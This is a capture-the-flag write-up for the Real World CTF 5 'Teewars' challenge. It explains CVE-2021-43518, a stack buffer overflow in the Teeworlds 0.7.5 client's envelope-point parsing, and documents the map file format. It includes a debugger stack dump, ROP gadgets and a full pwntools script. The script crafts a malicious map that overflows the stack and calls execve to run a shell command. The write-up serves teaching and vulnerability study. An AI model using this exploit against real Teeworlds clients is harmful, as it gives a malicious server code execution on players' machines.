Real World CTF 5 - Teewars
Disclaimer⌗
We played as part of Sauercloud.
Service⌗
This challenge targets a Teeworlds client. The provided service runs a client connecting with a server for retrieving a map and starting a multiplayer game. For interaction, a rust script is used which asks for the IP address of the server and forwards stdout
and stderr
of the client to us. Furthermore the Dockerfile for the service is provided. It compiles the current version, 0.7.5, from source without PIE (-no-pie
) and stack canaries (-fno-stack-protector
).
Vulnerability⌗
A quick search revealed CVE-2021-43518, which reports a stack buffer overflow in the given version. Attached to the CVE is a blog post and a github issue with additional information about this vulnerability. From the issue we can download a sample map triggering the overflow and find a merged pull reqeust fixing the overflow.
By looking at the fix, we can easily spot the buffer overflow occuring during the parsing of the map file in CMapLayers::LoadEnvPoints
. So let’s first make an excurse to the map file format.
Map files⌗
During this excurse we will build an ImHex pattern for easier inspection and manipulation of map files during the exploit. ImHex offers a C-like pattern language to parse files, allowing the user to display and inspect binary files in a understandable, structured way. Apart from a slightly different a naming and some quality of live features, such as annotating structures with the result of functions, the main difference to C is the ability to use conditions and loops inside struct definitions.
A map file starts with a header followed by an index for faster access of items and data. After that, the items are saved and the file is concluded with data. In version 4 of the map file format, the data is compressed with zlib. Because ImHex does not support zlib inflate, we won’t look at it. But this is no problem, since the buffer overflow occurs during parsing of the EnvPoints, which are stored in an item (more about that later). As the placement of the data section is determined by the informations from the header, we should do the same to get view parity with Teeworlds. As ImHex parses the definitions from top to bottom, the following snippets must be prepended to the ones before.
struct CDataFile {
// header
CDatafileHeader header;
// index
CDatafileItemType m_pItemTypes[header.m_NumItemTypes];
s32 m_pItemOffsets[header.m_NumItems];
s32 m_pDataOffsets[header.m_NumRawData];
s32 m_pDataSizes[header.m_NumRawData];
// items
CDatafileItem items[header.m_NumItems];
// (zlib deflated) data
u8 data[header.m_DataSize] @ addressof(items) + header.m_ItemSize;
};
// file starts at byte 0
CDataFile file @ 0x00;
The header contains basic information about the map, including the version and the number of items and data entries and the total size of all items and data.
struct CDatafileHeader
{
char m_aID[4]; // "DATA"
s32 m_Version;
s32 m_Size;
s32 m_Swaplen;
s32 m_NumItemTypes;
s32 m_NumItems;
s32 m_NumRawData;
s32 m_ItemSize;
s32 m_DataSize;
};
The following array of item types just lists the start index and the number of items for each type present in the map. Teeworlds has 7 different item types. The relevant ones for the exploit will be the Envelope
and the Envelope_Points
item type. Since enums are strictly typed in ImHex and we will need the type later with only 16 bits, we will define the remaining two bytes as padding. This ignores the relevance of the last two bytes but allows us to reuse the enum later.
enum type_id : s16 {
Version = 0,
Info = 1,
Image = 2,
Envelope = 3,
Group = 4,
Layer = 5,
Envelope_Points = 6,
};
struct CDatafileItemType
{
type_id m_Type;
padding[2];
s32 m_Start;
s32 m_Num;
};
Before looking into the different item types, let’s have a look at their common structure. Each item starts unique identifier formed by an ID unique in the scope of that item type and it’s type. This identifier is followed by the size of the following data. The definition of the data section illustrates the power of ImHex: depending on the type parsed earlier in the struct, we can specify different alternatives for the remaining content of the struct. By inlining the structs, we can flatten the hirachy. In addition, we will use a function to display ithe item’s type in the pattern view’s value column allowing us to see the item’s type without unfolding them.
fn show_type(auto to_show) {
return to_show.m_Type;
};
struct CDatafileItem
{
s16 m_ID;
type_id m_Type;
s32 m_Size;
if (m_Type == type_id::Version) {
CMapItemVersion version [[inline]];
}
else if (m_Type == type_id::Info) {
CMapItemInfo info [[inline]];
}
else if (m_Type == type_id::Image) {
CMapItemImage image [[inline]];
}
else if (m_Type == type_id::Envelope) {
CMapItemEnvelope envelope [[inline]];
}
else if (m_Type == type_id::Group) {
CMapItemGroup group [[inline]];
}
else if (m_Type == type_id::Layer) {
CMapItemLayer layer [[inline]];
}
else if (m_Type == type_id::Envelope_Points) {
CEnvPoint points[m_Size/sizeof(CEnvPoint)] [[inline]];
}
} [[format("show_type")]];
Despite not needing the other item types, we will shortly define them, as this allows us to get a better overview of the map file. Furthermore, this allows us to skip the parsing of the offsets by relying on their correctnes. The following definitions are copied from Teeworlds’ mapitems.h
and only adjusted by merging the different versions of the struct and changing their datatypes to the corresponding ones in ImHex. An explanation for the types can be found at the documentation of libtw2, a Rust implementation for some features of Teeworlds.
struct CPoint
{
s32 x, y; // 22.10 fixed point
};
struct CColor
{
s32 r, g, b, a;
};
struct CQuad
{
CPoint m_aPoints[5];
CColor m_aColors[4];
CPoint m_aTexcoords[4];
s32 m_PosEnv;
s32 m_PosEnvOffset;
s32 m_ColorEnv;
s32 m_ColorEnvOffset;
};
struct CTile
{
u8 m_Index;
u8 m_Flags;
u8 m_Skip;
u8 m_Reserved;
};
struct CMapItemInfo
{
// enum { CURRENT_VERSION=1 };
s32 m_Version;
s32 m_Author;
s32 m_MapVersion;
s32 m_Credits;
s32 m_License;
};
enum image_format : s32 {
RGB = 0,
RGBA
};
struct CMapItemImage
{
s32 m_Version;
s32 m_Width;
s32 m_Height;
s32 m_External;
s32 m_ImageName;
s32 m_ImageData;
if (m_Version > 1) {
image_format m_Format;
}
};
struct CMapItemGroup
{
s32 m_Version;
s32 m_OffsetX;
s32 m_OffsetY;
s32 m_ParallaxX;
s32 m_ParallaxY;
s32 m_StartLayer;
s32 m_NumLayers;
if (m_Version > 1) {
s32 m_UseClipping;
s32 m_ClipX;
s32 m_ClipY;
s32 m_ClipW;
s32 m_ClipH;
s32 m_aName[3];
}
};
enum tilemap_flags :s32 {
Tiles = 0,
Game = 1
};
struct CMapItemLayerTilemap
{
// enum { CURRENT_VERSION=4 };
s32 m_Version;
s32 m_Width;
s32 m_Height;
tilemap_flags m_Flags;
CColor m_Color;
s32 m_ColorEnv;
s32 m_ColorEnvOffset;
s32 m_Image;
s32 m_Data;
s32 m_aName[3];
};
struct CMapItemLayerQuads
{
// enum { CURRENT_VERSION=2 };
s32 m_Version;
s32 m_NumQuads;
s32 m_Data;
s32 m_Image;
s32 m_aName[3];
};
enum layer_type : s32 {
Invalid,
Game,
Tiles,
Quads
};
struct CMapItemLayer
{
s32 m_Version;
layer_type m_Type;
s32 m_Flags;
if (m_Type == layer_type::Tiles) {
CMapItemLayerTilemap m_Tilemap;
}
else if (m_Type == layer_type::Quads) {
CMapItemLayerQuads m_Quads;
}
};
struct CMapItemVersion
{
s32 m_Version;
};
With that big chunk of the file structure out of the way, let’s have a closer look at the relevant parts: Envelopes and Envelope Points.
An Envelope groups a range of points. The type of these points is defined by the number of channels. Furthermore the version of the envelope influences the parsing of the points for that envelope. Since all envelopes should have the same version, we can simply track the required point version with a global variable.
s32 POINT_VERSION = 2; // track point version
struct CMapItemEnvelope
{
// enum { CURRENT_VERSION=3 };
s32 m_Version;
s32 m_Channels;
s32 m_StartPoint;
s32 m_NumPoints;
s32 m_aName[8];
if (m_Version != 1) { // technically this should be >1,
// but for successfully reading the corrupted sample map
// without parsing the offsets,
// this change is needed to not fail
s32 m_Synchronized;
}
if (m_Version < 3) {
POINT_VERSION = 1;
}
};
Each point has a time and a curve type. Furthermore it features 4 values which are used according to the channels value of the containing envelope. With version 2, a point is increased by 4 tangent arrays containing 4 values each.
For getting the sizeof
operator used in CDatafileItem
to work, we have to define the CEnvPoint
struct as static. This is possible, since all points have the same layout. Furthermore, the static definition optimizes the parsing of the file.
enum curve_id : s32 {
Step = 0, // (abrupt drop at second value)
Linear = 1, // (linear value change)
Slow = 2, // (first slow, later much faster value change)
Fast = 3, // (first fast, later much slower value change)
Smooth = 4, // (slow, faster, then once more slow value change)
Bezier = 5 // (Vanilla only, very customizable curve)
};
struct CEnvPoint
{
s32 m_Time; // in ms
curve_id m_Curvetype;
s32 m_aValues[4]; // 1-4 depending on envelope (22.10 fixed point)
if (POINT_VERSION > 1) {
// bezier curve only
// dx in ms and dy as 22.10 fxp
s32 m_aInTangentdx[4];
s32 m_aInTangentdy[4];
s32 m_aOutTangentdx[4];
s32 m_aOutTangentdy[4];
}
//bool operator<(const CEnvPoint& other) const { return m_Time < other.m_Time; }
} [[static]];
With these information we can take a closer look at the provided map and it’s effect on Teeworlds. It features 27 items from which 6 are envelopes. All envelopes except the one with ID 1 are version 3 and fulfill the relevant constraints. The envelope with ID 1 has a version of -65533 (0xffff0003) and features 2 points with 65535 channels each.
Since we now know the map file, let’s have a closer look at the broken part of the parsing.
Buffer overflow⌗
The faulty function will load all points of all envelopes from the map and return them as array. It starts by locating and loading the data of all points from the map.
void CMapLayers::LoadEnvPoints(const CLayers *pLayers, array<CEnvPoint>& lEnvPoints)
{
lEnvPoints.clear();
// get envelope points
CEnvPoint *pPoints = 0x0;
{
int Start, Num;
pLayers->Map()->GetType(MAPITEMTYPE_ENVPOINTS, &Start, &Num);
if(!Num)
return;
pPoints = (CEnvPoint *)pLayers->Map()->GetItem(Start, 0, 0);
}
As next step, it requests the number of envelopes from the index.
// get envelopes
int Start, Num;
pLayers->Map()->GetType(MAPITEMTYPE_ENVELOPE, &Start, &Num);
if(!Num)
return;
After this preparations the interesting part of the function starts. The function will loop over all envelopes and parses them.
for(int env = 0; env < Num; env++)
{
CMapItemEnvelope *pItem = (CMapItemEnvelope *)pLayers->Map()->GetItem(Start+env, 0, 0);
If the envelope has version 3 or above, it’s points are already saved in version 2 and can be read directly from file.
if(pItem->m_Version >= 3)
{
for(int i = 0; i < pItem->m_NumPoints; i++)
lEnvPoints.add(pPoints[i + pItem->m_StartPoint]);
}
Envelopes with lower versions will use the old point format, lacking the tangent arrays. To have all points in the new format, they are converted to the new format. Due to the nature of the pointer arithmetic in C and C++ and the used parsing of the entire file region as points of the old version, all points have to have the same version or the points of the old format have to come first, leaving a hole between the different versions or requiring overlapping indices.
else
{
// backwards compatibility
for(int i = 0; i < pItem->m_NumPoints; i++)
{
// convert CEnvPoint_v1 -> CEnvPoint
CEnvPoint_v1 *pEnvPoint_v1 = &((CEnvPoint_v1 *)pPoints)[i + pItem->m_StartPoint];
CEnvPoint p;
p.m_Time = pEnvPoint_v1->m_Time;
p.m_Curvetype = pEnvPoint_v1->m_Curvetype;
Maybe in an attempt to speed up the conversion, only used channels are copied over to the sturct of the new version. Since the server controls the number of channels and they are parsed as 32-bit signed integer, the server can specify a much larger number of channels. Since C-arrays have no bounds checks, the data will be written as the array is large enough to hold them. Since the tangents follow the copied values, they will be overwritten by the excess values. As a consequence, this allows the server to overflow the stack. The length of the overflow can be chosen by the number of channels. After the copied memory content, the tangent arrays will always write 64 null bytes.
for(int c = 0; c < pItem->m_Channels; c++)
{
p.m_aValues[c] = pEnvPoint_v1->m_aValues[c];
p.m_aInTangentdx[c] = 0;
p.m_aInTangentdy[c] = 0;
p.m_aOutTangentdx[c] = 0;
p.m_aOutTangentdy[c] = 0;
}
lEnvPoints.add(p);
}
}
}
}
The merged pull request fixes this by capping the number of channels at 4 with the help of the minimum
function.
for(int c = 0; c < minimum(pItem->m_Channels, 4); c++)
Setup⌗
Before we can start examining the context of the overflow and exploiting the service, we have to get a working server distributing our carefully crafted exploit map. Under the releases of Teeworlds, precompiled binaries can be downloaded, including the server. The setup of the server is simple. We just need to place the map into a maps
folder relative to the server binary and start the server with the exploit map: ./teeworlds_srv "svmap exploit"
.
Stack⌗
Since we now know, how to trigger the overflow and which content will be written, we can examine the overflow in the Teeworlds client used in this challenge. For an easier exploit file, we will reduce the number of points in envelope 1 to 1, such that the overflow will be triggered only once. By replacing the first two values with 0x41414141 (“AAAA”) and after copying both values over to the stack, our payload is written to 0x7ffffffddc78 and the next return address can be found at 0x7ffffffddd08. As a result of this, 0x90 bytes of padding are needed in front of the ROP chain. Since the overflow is measured in units of 4 bytes, this corresponds to a padding of 34 channels. As already known from the Dockerfile, no canary is present.
pwndbg> stack 50
00:0000│ rsp 0x7ffffffddc30 ◂— 0x0
01:0008│ 0x7ffffffddc38 —▸ 0xa496b0 ◂— 0x100000000
02:0010│ 0x7ffffffddc40 —▸ 0x7ffffffddc70 ◂— 0x1
03:0018│ 0x7ffffffddc48 ◂— 0x100000000
04:0020│ 0x7ffffffddc50 ◂— 0x0
05:0028│ 0x7ffffffddc58 —▸ 0x77d180 ◂— 0xc00000005
06:0030│ 0x7ffffffddc60 ◂— 0x0
07:0038│ 0x7ffffffddc68 ◂— 0x600000006
08:0040│ 0x7ffffffddc70 ◂— 0x1
09:0048│ rax 0x7ffffffddc78 ◂— 'AAAAAAAA'
0a:0050│ 0x7ffffffddc80 ◂— 0x0
... ↓ 5 skipped
10:0080│ 0x7ffffffddcb0 —▸ 0x74cd58 —▸ 0x70616d ◂— 0x0
11:0088│ 0x7ffffffddcb8 ◂— 0x0
12:0090│ 0x7ffffffddcc0 —▸ 0x74cd58 —▸ 0x70616d ◂— 0x0
13:0098│ 0x7ffffffddcc8 —▸ 0x521915 ◂— 0x657661530070616d /* 'map' */
14:00a0│ 0x7ffffffddcd0 ◂— 0x10
15:00a8│ 0x7ffffffddcd8 —▸ 0x55bf40 (gs_MapLayersBackGround) —▸ 0x54cef8 —▸ 0x46b8d0 (CMapLayers::~CMapLayers()) ◂— endbr64
16:00b0│ 0x7ffffffddce0 —▸ 0x77c8d0 —▸ 0x54d820 —▸ 0x4b5f20 (CGameClient::~CGameClient()) ◂— endbr64
17:00b8│ 0x7ffffffddce8 —▸ 0x77d180 ◂— 0xc00000005
18:00c0│ 0x7ffffffddcf0 —▸ 0x7ffff6bfa010 —▸ 0x54bfc0 —▸ 0x43db00 (CClient::~CClient()) ◂— endbr64
19:00c8│ 0x7ffffffddcf8 —▸ 0x7ffffffddd80 —▸ 0x7ffff6c06a82 ◂— 0x375a5dfe52ada70b
1a:00d0│ 0x7ffffffddd00 ◂— 0x1
1b:00d8│ 0x7ffffffddd08 —▸ 0x46b752 (CMapLayers::OnMapLoad()+34) ◂— mov rdi, qword ptr [rbx + 8]
1c:00e0│ 0x7ffffffddd10 —▸ 0x7ffff6bfa010 —▸ 0x54bfc0 —▸ 0x43db00 (CClient::~CClient()) ◂— endbr64
1d:00e8│ 0x7ffffffddd18 ◂— 0xb /* '\x0b' */
1e:00f0│ 0x7ffffffddd20 —▸ 0x77d180 ◂— 0xc00000005
1f:00f8│ 0x7ffffffddd28 —▸ 0x4b5e0b (CGameClient::OnConnected()+75) ◂— mov rdi, qword ptr [rbp + rbx*8 + 0x10]
20:0100│ 0x7ffffffddd30 —▸ 0x7fffffffdee0 ◂— 0x100000000
21:0108│ 0x7ffffffddd38 —▸ 0x7ffff6bfa010 —▸ 0x54bfc0 —▸ 0x43db00 (CClient::~CClient()) ◂— endbr64
22:0110│ 0x7ffffffddd40 ◂— 0x0
23:0118│ 0x7ffffffddd48 —▸ 0x43ba7a (CClient::ProcessServerPacket(CNetChunk*)+1482) ◂— jmp 0x43b5c8
24:0120│ 0x7ffffffddd50 ◂— 0x568
25:0128│ 0x7ffffffddd58 ◂— 0x0
... ↓ 4 skipped
2a:0150│ 0x7ffffffddd80 —▸ 0x7ffff6c06a82 ◂— 0x375a5dfe52ada70b
2b:0158│ 0x7ffffffddd88 —▸ 0x7ffff6c06a83 ◂— 0x5375a5dfe52ada7
2c:0160│ 0x7ffffffddd90 —▸ 0x7ffff6c06a83 ◂— 0x5375a5dfe52ada7
2d:0168│ 0x7ffffffddd98 ◂— 0x0
... ↓ 4 skipped
Exploit⌗
With this information we cant start developing the exploit. Since the flag is stored in a file and the Rust script forwards the stdout of the client to us, a simple ROP chain leaking it’s content is sufficient to solve this challenge. So let’s have a look at the available gadgets by using ROPgadget --binary teeworlds
. Under the 49198 gadgets found by ROPgadget are a huge amount of basic instructions with a variaty of registers, including gadgets for a syscall with three arguments.
0x000000000045f135 : mov qword ptr [rdi], rax ; ret
0x000000000043faf0 : pop rax ; ret
0x00000000004326e3 : pop rdi ; ret
0x00000000004bc1d4 : pop rdx ; ret
0x0000000000437fcb : pop rsi ; ret
0x0000000000465f30 : syscall
Since most of the syscall
gadgets are followed by bad instructions or dereferenciations of rax, most syscalls will be followed by a crash. A solution to this problem is the execve
syscall, since it replaces the entire process with the new one. execve
needs three arguments: the path of the new executable, its arguments and its environment. While the first argument is mandatory, the following ones can also be null. Since we want to log the content of a file, cat
is a viable target. Since cat
expects the file to print as it’s argument, we also need to build argv. Because the service is compiled without PIE, we not only know the address of the gadgets but also the address of the writable bss segment containing uninitialized global variables. This allows us to use one of the move instructions, such as mov qword ptr [rdi], rax; ret
, to prepare the argument array by first popping the memory content and it’s address and then moving it to the previously popped address.
pop rax; ret
$content
pop rdi; ret
$address
mov qword ptr [rdi], rax; ret
Since cat
may be in different places on our system and the one used by the service and we wanted the exploit to also work on our system for testing purposes, we decided to use sh
for resolving cat
. The full argv will therefore be ["/bin/sh", "-c", "cat /home/rwctf/flag"]
.
Now we can start developing the exploit.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
elf = context.binary = ELF('./teeworlds')
rop = ROP(elf)
rop_chain = b""
Let’s begin with writing argv
into the bss section. Since strings in C are null-terminated, we can use null bytes to easily seperate the arguments.
argv = [b"/bin/sh", b"-c", b"cat /home/rwctf/flag"]
# concatenate arguments with terminating null bytes
flat_argv = b"\0".join(argv) + b"\0"
# choose address inside bss segment
argv_start = 0x6c0000
argv
is a null-terminated array of string pointers, each containing one argument. So let’s calculate the positions of the individual arguments.
# write pointer
offset = 0
content_start = argv_start + (len(argv)+1)*8
qwords = []
for i in range(len(argv)):
# calculate address
qwords.append(p64(content_start + offset))
# adjust offset
offset += len(argv[i]) + 1
# append terminating null pointer
qwords.append(p64(0))
Since the code for moving 8 bytes to bss does not discriminate between pointers and strings, we can also add the content of argv
in 8 byte chunks to the list before writing it to the bss segment. Since argv
does not need to have a length divisible by 8, we have to ensure this by padding with null bytes.
# add content of argv
for pos in range(0, len(flat_argv)+7, 8):
qwords.append(flat_argv[pos:pos+8].ljust(8, b"\0")) # ensure 8 bytes
Now we can write the prepared argv
to it’s destination.
destination = argv_start
for qword in qwords:
# pop destination to rdi
rop_chain += p64(rop.rdi.address)
rop_chain += p64(destination)
# pop content to rax
rop_chain += p64(rop.rax.address)
rop_chain += qword
# move content to destination
rop_chain += p64(0x45f135) # mov qword ptr [rdi], rax; ret
# advance destination
destination += 8
Finally, we have to execute the syscall.
# do syscall
rop_chain += p64(rop.rdi.address)
rop_chain += p64(content_start) # argv[0]
rop_chain += p64(rop.rsi.address)
rop_chain += p64(argv_start) # argv
rop_chain += p64(rop.rdx.address)
rop_chain += p64(0) # env
rop_chain += p64(rop.rax.address)
rop_chain += p64(59) # execve
rop_chain += p64(rop.syscall.address)
After building the ROP chain, we have to integrate it into the prepared map file. From looking at the pattern data in ImHex, we can spot the relevant parts of the map file that need to be adjusted for the exploit. The number of channels can be found at 0x24c and the overflowable point’s values start at 0x750.
With this information, we can finalize the script by building the exploit map.
# read prepared map from file
with open("maps/prepared.map", "rb") as f:
map_content = f.read()
# write with changed parts to file
with open("maps/exploit.map", "wb") as f:
# copy start of file
f.write(map_content[:0x24c])
# adjust number of channels
f.write(p32((len(rop_chain) + 0x90) // 4))
# copy items until start of overflow
f.write(map_content[0x250:0x750+0x90])
# overflow with ROP chain
f.write(rop_chain)
# copy remaining map content
f.write(map_content[0x750+0x90+len(rop_chain):])
Flag⌗
After hosting the exploit map on our VM and supplying it’s IP address to the service, we got the flag: rwctf{Newb1e_1ear1ng_Game_Map}